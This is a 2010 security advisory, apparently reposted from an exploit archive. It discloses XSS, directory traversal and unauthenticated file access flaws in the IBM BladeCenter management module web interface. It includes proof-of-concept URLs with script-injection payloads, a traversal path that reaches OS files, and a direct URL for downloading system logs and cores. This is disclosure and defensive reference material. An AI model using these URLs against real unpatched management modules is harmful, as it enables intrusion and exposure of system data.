IBM Bladecenter Management - Multiple vulnerabilities
Posted on 06 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IBM Bladecenter Management - Multiple vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== IBM Bladecenter Management - Multiple vulnerabilities ===================================================== Application: IBM BladeCenter Managemet Module Versions Affected: BPET48L and may be other versions Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: XSS,Directory traversal, Information disclosure Exploits: YES Reported: 05.09.2009 Vendor response: 09.09.2009 Solution: YES Date of Public Advisory: 05.07.2010 Author: Sintsov Alexey from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *********** The BladeCenter management module is prone to multiple security vulnerabilities: 1 Dinamic XSS 2 Directory Listing 3 Unauthorized Access Details ******* 1. Multiple XSS vulnerabilities found in bladecenter web management Examples ******* http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert('XSS1');%3C/script%3E&VLANID=&IPADDR=3>%3Cscript%3Ealert('XSS2');%3C/script%3E http://[BLADECENTER]/private/power_management_policy_options.php?domain=3<XSS> http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS> http://[BLADECENTER]/private/power_module.php?view=4&mod_type=4&slot=3<XSS> http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS> http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3<XSS> http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3<XSS>&save=1 2. Directory Listing vulnerability found in bladecenter web management Attacker need to be authorized. Examples ******* http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc Attacker can get full access to OS files. 3. UNauthorized access Access to the sensitive data (system logs, cores) can be done by requesting a file: Examples ******* http://[BLADECENTER]/private/sdc.tgz Solution ******** All three issues were fixed in the v4.7 and v5.0 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
